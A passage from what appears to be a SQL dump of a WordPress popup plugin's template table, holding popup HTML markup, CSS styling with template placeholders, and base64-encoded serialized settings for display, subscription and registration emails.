jtzOjE6IjEiO319','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupClassyShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose\"></a>\r\n	<div class=\"ppsPopupClassyInner\">\r\n		[if enb_label]\r\n			<div class=\"ppsPopupLabel ppsPopupClassyLabel\">[label]</div>\r\n		[endif]\r\n		<div class=\"ppsPopupVideo\">\r\n			[video_html]\r\n		</div>\r\n      	[if enb_sm]\r\n        <div class=\"ppsSm\">\r\n            [sm_html]\r\n        </div>\r\n        [endif]\r\n		<div style=\"clear: both;\"></div>\r\n	</div>\r\n	[if enb_subscribe]\r\n	<div class=\"ppsSubscribeShell\">\r\n		[sub_form_start]\r\n          	[sub_fields_html]\r\n			<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n		[sub_form_end]\r\n	</div>\r\n  	[endif]\r\n  	[if enb_foot_note]\r\n  	<div class=\"ppsFootNote\">[foot_note]</div>\r\n  	[endif]\r\n</div>','#ppsPopupShell_[ID] {\r\n  	width: [width][width_measure];\r\n	[if bg_type_0 == \'color\']\r\n	background-color: {{ popup.params.tpl.bg_color_0 }};\r\n	[elseif bg_type_0 == \'img\']\r\n	background-image: url(\"[bg_img_0]\");\r\n	background-size: 100%;\r\n  	background-repeat: no-repeat;\r\n	[endif]\r\n	padding: 7px;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: content-box;\r\n	-moz-box-sizing:    content-box;\r\n	box-sizing:         content-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClassyInner {\r\n	padding: 0;\r\n	border: {{ adjust_brightness(popup.params.tpl.bg_color_0, 30) }};\r\n	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ popup.params.tpl.bg_color_0 }}), color-stop(100%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }})); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ popup.params.tpl.bg_color_0 }}\', endColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }}\',GradientType=1 ); /* ie6-9 */\r\n	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	height: 48px;\r\n	font-size: 27px;\r\n	border: none;\r\n	padding: 1px 8px 0;\r\n	width: calc((100% - 70px) / 3);\r\n  	box-sizing: content-box;\r\n  	margin-top: 10px;\r\n  	float: left;\r\n  	display: block;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	[if bg_type_0 == \'color\']\r\n	-webkit-box-shadow: inset 4px 4px 4px 0px {{ adjust_brightness(popup.params.tpl.bg_color_0, -40) }};\r\n	-moz-box-shadow: inset 4px 4px 4px 0px {{ adjust_brightness(popup.params.tpl.bg_color_0, -40) }};\r\n	box-shadow: inset 4px 4px 4px 0px {{ adjust_brightness(popup.params.tpl.bg_color_0, -40) }};\r\n	background-color: {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }};\r\n	color: {{ adjust_brightness(popup.params.tpl.bg_color_0, -100) }};\r\n	[endif]\r\n	margin-right: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n  	display: table-cell;\r\n  	height: 48px;\r\n  	vertical-align: middle;\r\n  	background-color: transparent;\r\n  	border: none;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select option {\r\n	font-size: 27px;\r\n  	color: #6d6d6d;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: calc(100% - 30px);\r\n  	height: auto;\r\n  	font-family: inherit;\r\n  	padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	color: #eee;\r\n	margin-right: 0;\r\n	cursor: pointer;\r\n	[if bg_type_1 == \'color\']\r\n	text-shadow: -1px -1px 1px {{ adjust_brightness(popup.params.tpl.bg_color_1, -80) }};\r\n	border: 1px solid {{ adjust_brightness(popup.params.tpl.bg_color_1, -40) }};\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ popup.params.tpl.bg_color_1 }}), color-stop(100%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }})); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ popup.params.tpl.bg_color_1 }}\', endColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }}\',GradientType=1 ); /* ie6-9 */\r\n\r\n	-webkit-box-shadow: inset 0px 0px 2px 2px {{ adjust_brightness(popup.params.tpl.bg_color_1, 10) }};\r\n	-moz-box-shadow: inset 0px 0px 2px 2px {{ adjust_brightness(popup.params.tpl.bg_color_1, 10) }};\r\n	box-shadow: inset 0px 0px 2px 2px {{ adjust_brightness(popup.params.tpl.bg_color_1, 10) }};\r\n	[elseif bg_type_1 == \'img\']\r\n	background-image: url(\"[bg_img_1]\");\r\n	background-size: 100%;\r\n  	background-repeat: no-repeat;\r\n	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:disabled {\r\n	color: transparent;\r\n  	cursor: progress;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell {\r\n	padding-top: 10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	margin: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClassyLabel {\r\n	width: 100%;\r\n	text-align: center;\r\n	color: #555555;\r\n	text-shadow: 1px 1px 1px #ffffff;\r\n	font-size: 35px;\r\n	margin-top: 26px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSuccessMsg {\r\n	color: #555555;\r\n  	border: 1px solid #555555;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClassyTxt {\r\n	font-size: 20px;\r\n	line-height: 160%;\r\n	color: rgb(85, 85, 85);\r\n	padding-top: 14px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupVideo {\r\n	width: 100%;\r\n  	line-height: 0;\r\n  	padding: 0;\r\n  	margin: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupVideo iframe {\r\n  	margin: 0;\r\n}\r\n#ppsPopupShell_[ID] ul {\r\n	margin-top: 15px;\r\n	padding-left: 0;\r\n}\r\n#ppsPopupShell_[ID] ul li {\r\n	list-style: inside none disc;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote {\r\n	color: #999;\r\n    font-size: 12px;\r\n    padding-top: 10px;\r\n    text-align: center;\r\n}\r\n/*SM*/\r\n#ppsPopupShell_[ID] .ppsSm {\r\n	padding: 10px 10px 0 10px;\r\n  	text-align: center;\r\n}\r\n#ppsPopupShell_1_435376 .ppsSm > div {\r\n	vertical-align: top !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm .ppsSmBtn {\r\n	margin-right: 5px;\r\n}','',1,1,1,3,0,0,0,'2015-01-03 16:00:43',16,0),(7,'Layered Popup',1,0,'YTozOntzOjQ6Im1haW4iO2E6MjE6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6Nzoic2hvd190byI7czo4OiJldmVyeW9uZSI7czoyOToic2hvd190b19maXJzdF90aW1lX3Zpc2l0X2RheXMiO3M6MjoiMzAiO3M6MzA6InNob3dfdG9fdW50aWxfbWFrZV9hY3Rpb25fZGF5cyI7czoyOiIzMCI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjt9czozOiJ0cGwiO2E6ODA6e3M6NToid2lkdGgiO3M6MzoiNDAwIjtzOjEzOiJ3aWR0aF9tZWFzdXJlIjtzOjI6InB4IjtzOjE4OiJiZ19vdmVybGF5X29wYWNpdHkiO3M6MzoiMC41IjtzOjk6ImJnX3R5cGVfMCI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMCI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiI2YwNjIyZSI7czo5OiJiZ190eXBlXzEiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzEiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiNkYWQyYmYiO3M6OToiYmdfdHlwZV8yIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18yIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMiI7czo3OiIjNTU1NTU1IjtzOjEwOiJmb250X2xhYmVsIjtzOjc6ImRlZmF1bHQiO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiI2ZmZmZmZiI7czoxMDoiZm9udF90eHRfMCI7czo3OiJkZWZhdWx0IjtzOjE3OiJ0ZXh0X2ZvbnRfY29sb3JfMCI7czo3OiIjZmZmZmZmIjtzOjExOiJmb250X2Zvb3RlciI7czo3OiJkZWZhdWx0IjtzOjE3OiJmb290ZXJfZm9udF9jb2xvciI7czo3OiIjNTg1ODU4IjtzOjE1OiJyZXNwb25zaXZlX21vZGUiO3M6MzoiZGVmIjtzOjk6ImNsb3NlX2J0biI7czoxMToid2hpbGVfY2xvc2UiO3M6NzoiYnVsbGV0cyI7czoxMToibGlzdHNfZ3JlZW4iO3M6MTE6ImxheWVyZWRfcG9zIjtzOjM6InRvcCI7czo5OiJlbmJfbGFiZWwiO3M6MToiMSI7czo1OiJsYWJlbCI7czoxODoiVGhlIEJlc3QgV29yZFByZXNzIjtzOjk6ImVuYl90eHRfMCI7czoxOiIxIjtzOjEzOiJlbmJfZm9vdF9ub3RlIjtzOjE6IjEiO3M6OToiZm9vdF9ub3RlIjtzOjExODoiV2UgcmVzcGVjdCB5b3VyIHByaXZhY3kuIFlvdXIgaW5mb3JtYXRpb24gd2lsbCBub3QgYmUgc2hhcmVkIHdpdGggYW55IHRoaXJkIHBhcnR5IGFuZCB5b3UgY2FuIHVuc3Vic2NyaWJlIGF0IGFueSB0aW1lICI7czo2OiJlbmJfc20iO3M6MToiMSI7czoxNToiZW5iX3NtX2ZhY2Vib29rIjtzOjE6IjEiO3M6MTc6ImVuYl9zbV9nb29nbGVwbHVzIjtzOjE6IjEiO3M6MTQ6ImVuYl9zbV90d2l0dGVyIjtzOjE6IjEiO3M6OToic21fZGVzaWduIjtzOjQ6ImJveHkiO3M6ODoiYW5pbV9rZXkiO3M6NDoibm9uZSI7czoxMzoiYW5pbV9kdXJhdGlvbiI7czozOiI1MDAiO3M6MTM6ImVuYl9zdWJzY3JpYmUiO3M6MToiMSI7czo4OiJzdWJfZGVzdCI7czo5OiJ3b3JkcHJlc3MiO3M6MjM6InN1Yl93cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjE5OiJzdWJfYXdlYmVyX2xpc3RuYW1lIjtzOjA6IiI7czoyMToic3ViX2F3ZWJlcl9hZHRyYWNraW5nIjtzOjA6IiI7czoyMToic3ViX21haWxjaGltcF9hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX2dyX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX3VybCI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfa2V5IjtzOjA6IiI7czoxODoic3ViX2FyX2Zvcm1fYWN0aW9uIjtzOjA6IiI7czoxMDoic3ViX3NnYV9pZCI7czowOiIiO3M6MTU6InN1Yl9zZ2FfbGlzdF9pZCI7czowOiIiO3M6MjE6InN1Yl9zZ2FfYWN0aXZhdGVfY29kZSI7czowOiIiO3M6MTA6InN1Yl9maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InN1Yl90eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJzdWJfdHh0X3N1Y2Nlc3MiO3M6MjQ6IlRoYW5rIHlvdSBmb3Igc3Vic2NyaWJlISI7czoyMToic3ViX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czo4OiJTaWduLXVwISI7czoxMzoic3ViX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InN1Yl9uZXdfbWVzc2FnZSI7czoxMjk6IllvdSBoYXZlIG5ldyBzdWJzY3JpYmVyIG9uIHlvdXIgc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4sIGhlcmUgdXMgc3Vic2NyaWJlciBpbmZvcm1hdGlvbjo8YnIgLz5bc3Vic2NyaWJlcl9kYXRhXSI7czoxODoibG9naW5fcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoxNToibG9naW5fYnRuX2xhYmVsIjtzOjU6IkxvZ2luIjtzOjE2OiJyZWdfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyMzoicmVnX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTM6InJlZ19idG5fbGFiZWwiO3M6ODoiUmVnaXN0ZXIiO3M6MTA6InJlZ19maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InJlZ190eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJyZWdfdHh0X3N1Y2Nlc3MiO3M6Mjc6IlRoYW5rIHlvdSBmb3IgcmVnaXN0cmF0aW9uISI7czoyMToicmVnX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHJlZ2lzdHJhdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoicmVnX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTY6IllvdSByZWdpc3RlcmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHJlZ2lzdHJhdGlvbi4gSWYgeW91IGRpZCBub3QgcmVnaXN0ZXIgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoxMzoicmVnX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InJlZ19uZXdfbWVzc2FnZSI7czoxMjE6IllvdSBoYXZlIG5ldyBtZW1iZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSB1cyBtZW1iZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6NToidHh0XzAiO3M6MTcyOiI8cD5Qb3B1cCBieSBTdXBzeXN0aWMgbGV0cyB5b3UgZWFzaWx5IGNyZWF0ZSBlbGVnYW50IG92ZXJsYXBwaW5nIHdpbmRvd3Mgd2l0aCB1bmxpbWl0ZWQgZmVhdHVyZXMuIFBvcC11cHMgd2l0aCBTbGlkZXIsIExpZ2h0Ym94LCBDb250YWN0IGFuZCBTdWJzY3JpcHRpb24gZm9ybXMgYW5kIG1vcmU8L3A+Ijt9czoxMDoib3B0c19hdHRycyI7YToyOntzOjk6ImJnX251bWJlciI7czoxOiIzIjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjEiO319','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n			[endif]\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsRightCol\">\r\n				[if enb_sm]\r\n					<div style=\"clear: both;\"></div>\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: Georgia, Times, serif;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #fff;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: content-box;\r\n	-moz-box-sizing:    content-box;\r\n	box-sizing:         content-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 100%;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #FFF;\r\n	font-family: \"Myriad Pro\",\"Trebuchet MS\",\"Helvetica Neue\",Helvetica,Arial,Sans-Serif;\r\n	font-size: 30px;\r\n	letter-spacing: -1px;\r\n	line-height: 40px;\r\n	letter-spacing: -1px;\r\n	font-weight: bold;\r\n	text-align: center;\r\n	margin-bottom: 16px;\r\n	padding-left: 20px;\r\n	-moz-text-shadow: 0px 0px 1px #000;\r\n	-webkit-text-shadow: 0px 0px 1px #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsRightCol {\r\n  	height: 100%;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}), color-stop(100%, [bg_color_1])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* 